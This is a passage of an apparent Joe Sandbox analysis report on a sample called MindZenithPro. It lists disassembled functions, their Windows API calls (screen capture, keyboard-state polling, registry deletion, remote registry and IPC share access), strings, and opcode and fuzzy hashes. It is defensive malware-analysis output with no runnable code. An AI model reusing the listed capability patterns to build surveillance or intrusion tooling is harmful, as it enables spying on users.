                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                    • API String ID: 1234038744-3931177956
                                    • Opcode ID: 133f3c000fd2f61b2e90bc87d1da79ef3d729a16995007639e17d88870c9653e
                                    • Instruction ID: b44666f3a36eb9b717ff1787a36fbf35ba592964f3964e6d9f161e118e998fd7
                                    • Opcode Fuzzy Hash: 133f3c000fd2f61b2e90bc87d1da79ef3d729a16995007639e17d88870c9653e
                                    • Instruction Fuzzy Hash: FBD10471A00215DBDB15AF65D885B6EB7B4FF0D700F10A45AE801AF2A1CB78EC42DB65
                                    Function 00442CE3 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDC.USER32(00000000), ref: 00442D5F
                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00442D6F
                                    • CreateCompatibleDC.GDI32(?), ref: 00442D7B
                                    • SelectObject.GDI32(00000000,?), ref: 00442D88
                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00442DF4
                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00442E33
                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00442E57
                                    • SelectObject.GDI32(?,?), ref: 00442E5F
                                    • DeleteObject.GDI32(?), ref: 00442E68
                                    • DeleteDC.GDI32(?), ref: 00442E6F
                                    • ReleaseDC.USER32(00000000,?), ref: 00442E7A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                    • String ID: (
                                    • API String ID: 2598888154-3887548279
                                    • Opcode ID: 10ed440ff7ea46ce0b9b6bc34713f862bef1522803b9efe37266cb7321522d2f
                                    • Instruction ID: e3d7e43b33a71774b72a1f2aee5d7d256c75fb3b1294e08e8ab05a585948e403
                                    • Opcode Fuzzy Hash: 10ed440ff7ea46ce0b9b6bc34713f862bef1522803b9efe37266cb7321522d2f
                                    • Instruction Fuzzy Hash: A36112B5D00219EFDF14CFA4C984EAEBBB5FF48310F20852AE959A7250D774A941CFA4
                                    Function 0042503F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClassNameW.USER32(?,?,00000400), ref: 0042507B
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 004250BD
                                    • _wcslen.LIBCMT ref: 004250CE
                                    • CharUpperBuffW.USER32(?,00000000), ref: 004250DA
                                    • _wcsstr.LIBVCRUNTIME ref: 0042510F
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00425147
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00425180
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 004251DA
                                    • GetClassNameW.USER32(?,?,00000400), ref: 0042520C
                                    • GetWindowRect.USER32(?,?), ref: 00425284
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                    • String ID: ThumbnailClass
                                    • API String ID: 1311036022-1241985126
                                    • Opcode ID: f4e00270003772ba394fb5c504e0236735ba2f9d2843f6339d025b806432e2f4
                                    • Instruction ID: 9bc3477d2795ecdccb58b98d8f3d816d4669eb123746faa92604e6b7cb8dca1b
                                    • Opcode Fuzzy Hash: f4e00270003772ba394fb5c504e0236735ba2f9d2843f6339d025b806432e2f4
                                    • Instruction Fuzzy Hash: 6A912731204B16AFD704DF24E894BBBB7A8FF00304F40452EFA8686291DB39ED56CB95
                                    Function 004593FA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003D9DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 003D9DE2
                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00459446
                                    • GetFocus.USER32 ref: 00459456
                                    • GetDlgCtrlID.USER32(00000000), ref: 00459461
                                    • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00459509
                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 004595BB
                                    • GetMenuItemCount.USER32(?), ref: 004595D8
                                    • GetMenuItemID.USER32(?,00000000), ref: 004595E8
                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0045961A
                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0045965C
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0045968D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                    • String ID: 0
                                    • API String ID: 1026556194-4108050209
                                    • Opcode ID: 7074ca1957a133b51c46dfdfd193e43ab549099bbfe505bd0819a2fe2fb5bcb3
                                    • Instruction ID: 5995d6f4d59b86e9f7b4fbf02530b68ca04908fdeb7a4125ca87dc5721768cbb
                                    • Opcode Fuzzy Hash: 7074ca1957a133b51c46dfdfd193e43ab549099bbfe505bd0819a2fe2fb5bcb3
                                    • Instruction Fuzzy Hash: 36819C71508305EBDB21CF25C884A6B7BE8AF88315F00052EFD4597292E774DD09CBAA
                                    Function 0042C631 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetMenuItemInfoW.USER32(004929B0,000000FF,00000000,00000030), ref: 0042C6AD
                                    • SetMenuItemInfoW.USER32(004929B0,00000004,00000000,00000030), ref: 0042C6E2
                                    • Sleep.KERNEL32(000001F4), ref: 0042C6F4
                                    • GetMenuItemCount.USER32(?), ref: 0042C73A
                                    • GetMenuItemID.USER32(?,00000000), ref: 0042C757
                                    • GetMenuItemID.USER32(?,-00000001), ref: 0042C783
                                    • GetMenuItemID.USER32(?,?), ref: 0042C7CA
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0042C810
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0042C825
                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0042C846
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                    • String ID: 0
                                    • API String ID: 1460738036-4108050209
                                    • Opcode ID: fb3670c79bd23124b2db0dc88718fee84ca3ea19016310a7d7d8570dd6450cfc
                                    • Instruction ID: c2b409ce58dc1fc5887d8da575f6d250e4ec2b9f793f39f606405a633c417397
                                    • Opcode Fuzzy Hash: fb3670c79bd23124b2db0dc88718fee84ca3ea19016310a7d7d8570dd6450cfc
                                    • Instruction Fuzzy Hash: BD61B670A0026ABBDF21DF64E8C8AFF7B78EF05349F54402AE801A3251D778AD05CB65
                                    Function 0042E1EC Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0042E1FE
                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0042E224
                                    • _wcslen.LIBCMT ref: 0042E22E
                                    • _wcsstr.LIBVCRUNTIME ref: 0042E27E
                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0042E29A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                    • API String ID: 1939486746-1459072770
                                    • Opcode ID: ed2b98a9d067f7870a383e9c5edb043d067bab5585b163d177a4d456c9690479
                                    • Instruction ID: e9e2f67ac14aeb4edcd28118349eabcd9bcd616960cac2f6df4a5e188e386ada
                                    • Opcode Fuzzy Hash: ed2b98a9d067f7870a383e9c5edb043d067bab5585b163d177a4d456c9690479
                                    • Instruction Fuzzy Hash: FD412932A003247AD716B7629C46FFF37ACDF55711F60056AF901AA1C2EA78D90193A9
                                    Function 0044D3B2 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0044D3E2
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0044D40B
                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0044D4C6
                                      • Part of subcall function 0044D3B2: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0044D428
                                      • Part of subcall function 0044D3B2: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0044D43B
                                      • Part of subcall function 0044D3B2: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0044D44D
                                      • Part of subcall function 0044D3B2: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0044D483
                                      • Part of subcall function 0044D3B2: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0044D4A6
                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 0044D471
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                    • API String ID: 2734957052-4033151799
                                    • Opcode ID: e8b8e118d2ecb01fefb986ca3645d5db4c4b5f48563a15a509b1c3bde7b12106
                                    • Instruction ID: 1abf3b137597125c6fc5fe6cd15e66b8024b8afb2d880afd9fc0169f5feed5ea
                                    • Opcode Fuzzy Hash: e8b8e118d2ecb01fefb986ca3645d5db4c4b5f48563a15a509b1c3bde7b12106
                                    • Instruction Fuzzy Hash: 1B318075D01229BBE7309B90DC88EEFBB7CEF05B15F000166B805E3245DA789A459AA4
                                    Function 0042ECF1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • timeGetTime.WINMM ref: 0042ECF5
                                      • Part of subcall function 003DEF0E: timeGetTime.WINMM(?,?,0042ED15), ref: 003DEF12
                                    • Sleep.KERNEL32(0000000A), ref: 0042ED22
                                    • EnumThreadWindows.USER32(?,Function_0006ECA6,00000000), ref: 0042ED46
                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0042ED68
                                    • SetActiveWindow.USER32 ref: 0042ED87
                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0042ED95
                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0042EDB4
                                    • Sleep.KERNEL32(000000FA), ref: 0042EDBF
                                    • IsWindow.USER32 ref: 0042EDCB
                                    • EndDialog.USER32(00000000), ref: 0042EDDC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                    • String ID: BUTTON
                                    • API String ID: 1194449130-3405671355
                                    • Opcode ID: 31d0228c1b2608d8595663ed0a3156ba2b22adc015bb2ba6af25f15684ea9e14
                                    • Instruction ID: dc9691b9a7d3489128afcc6619f5dc766828c0c3101f516fcd8545b4bece9c00
                                    • Opcode Fuzzy Hash: 31d0228c1b2608d8595663ed0a3156ba2b22adc015bb2ba6af25f15684ea9e14
                                    • Instruction Fuzzy Hash: 4F215E70620356BFE7315F71FC88B2A3B69EF56746B540036F40282362DA698C45DA1D
                                    Function 0042F03D Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003CA1D4: _wcslen.LIBCMT ref: 003CA1DE
                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0042F09E
                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0042F0B4
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0042F0C5
                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0042F0D7
                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0042F0E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: SendString$_wcslen
                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                    • API String ID: 2420728520-1007645807
                                    • Opcode ID: bb692ece37065b8688c69edce720cdff81e7b55dda06b38c17882697a02a7d40
                                    • Instruction ID: b0858e382a68fad9efbc7275d78f3a1078df07f2444258fc7f0a0053c774c720
                                    • Opcode Fuzzy Hash: bb692ece37065b8688c69edce720cdff81e7b55dda06b38c17882697a02a7d40
                                    • Instruction Fuzzy Hash: 0B11C170A9012979E720B266DC5AFFF7A7CEB91B00FA0087BB401E20D1DAA45D49C7B5
                                    Function 0042A692 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 0042A713
                                    • SetKeyboardState.USER32(?), ref: 0042A77E
                                    • GetAsyncKeyState.USER32(000000A0), ref: 0042A79E
                                    • GetKeyState.USER32(000000A0), ref: 0042A7B5
                                    • GetAsyncKeyState.USER32(000000A1), ref: 0042A7E4
                                    • GetKeyState.USER32(000000A1), ref: 0042A7F5
                                    • GetAsyncKeyState.USER32(00000011), ref: 0042A821
                                    • GetKeyState.USER32(00000011), ref: 0042A82F
                                    • GetAsyncKeyState.USER32(00000012), ref: 0042A858
                                    • GetKeyState.USER32(00000012), ref: 0042A866
                                    • GetAsyncKeyState.USER32(0000005B), ref: 0042A88F
                                    • GetKeyState.USER32(0000005B), ref: 0042A89D
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    • Opcode ID: f0de2143031b19250fb6917d2a2ca9521e397d3bb4b90b6f777eb896c383f161
                                    • Instruction ID: d031f98a179d74ff52c1d49563539482b1f1f6da664b5b7d2ea497bd06062889
                                    • Opcode Fuzzy Hash: f0de2143031b19250fb6917d2a2ca9521e397d3bb4b90b6f777eb896c383f161
                                    • Instruction Fuzzy Hash: 4751DC20B047A81AFB34E76068157ABBFB49F01384F88459FCDC2562C2DB58DA4CC76B
                                    Function 004263BF Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDlgItem.USER32(?,00000001), ref: 004263DB
                                    • GetWindowRect.USER32(00000000,?), ref: 004263F4
                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00426452
                                    • GetDlgItem.USER32(?,00000002), ref: 00426462
                                    • GetWindowRect.USER32(00000000,?), ref: 00426474
                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 004264C8
                                    • GetDlgItem.USER32(?,000003E9), ref: 004264D6
                                    • GetWindowRect.USER32(00000000,?), ref: 004264E8
                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 0042652A
                                    • GetDlgItem.USER32(?,000003EA), ref: 0042653D
                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00426553
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00426560
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Window$ItemMoveRect$Invalidate
                                    • String ID:
                                    • API String ID: 3096461208-0
                                    • Opcode ID: c33861d336d13e24eecf585af52f279d3d0bf0ea6c3dda8bbf3020a6421f6431
                                    • Instruction ID: c5430bd46f1ed9564e902c6fde3510871d347e41dc27c342f88944990be1c73b
                                    • Opcode Fuzzy Hash: c33861d336d13e24eecf585af52f279d3d0bf0ea6c3dda8bbf3020a6421f6431
                                    • Instruction Fuzzy Hash: E9515DB0F00215AFDB18CFA8DD85AAEBBB5FF48301F508129F909E7294D774AE408B54
                                    Function 003D9A68 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003D9B74: GetWindowLongW.USER32(?,000000EB), ref: 003D9B82
                                    • GetSysColor.USER32(0000000F), ref: 003D9A92
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ColorLongWindow
                                    • String ID:
                                    • API String ID: 259745315-0
                                    • Opcode ID: 7675120af810fef54a445f486f330b256c8d83e5b94d54e62f1979bd9052c8e8
                                    • Instruction ID: f4876e19ab87c05545c3d24cd67fe87758fb28c36eeb49c351378dfdc0c736c1
                                    • Opcode Fuzzy Hash: 7675120af810fef54a445f486f330b256c8d83e5b94d54e62f1979bd9052c8e8
                                    • Instruction Fuzzy Hash: D341B232504744AFCB219F38AC88BBA3775EF45325F154217F9A28B2E1C7719D82DB15
                                    Function 00420D65 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003C7467: _wcslen.LIBCMT ref: 003C747A
                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00420E29
                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00420E45
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00420E61
                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00420E8B
                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00420EB3
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00420EBE
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00420EC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                    • API String ID: 323675364-22481851
                                    • Opcode ID: d91795211ae3e6f669f8ab87b9c85f7348a0ec245c5ef37a0450d6fbe87a2e11
                                    • Instruction ID: b4f045552be4a3967d54a0d5391cabe291ccd096a9c1a42cfddfd67fcac47acb
                                    • Opcode Fuzzy Hash: d91795211ae3e6f669f8ab87b9c85f7348a0ec245c5ef37a0450d6fbe87a2e11
                                    • Instruction Fuzzy Hash: BC412D72C1062DABCF22EFA4DC85DEEB7B8BF14714F40456AE801A72A1DB349D44CB94
                                    Function 00454756 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 004547FB
                                    • CreateCompatibleDC.GDI32(00000000), ref: 00454802
                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00454815
                                    • SelectObject.GDI32(00000000,00000000), ref: 0045481D
                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00454828
                                    • DeleteDC.GDI32(00000000), ref: 00454832
                                    • GetWindowLongW.USER32(?,000000EC), ref: 0045483C
                                    • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00454852
                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 0045485E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
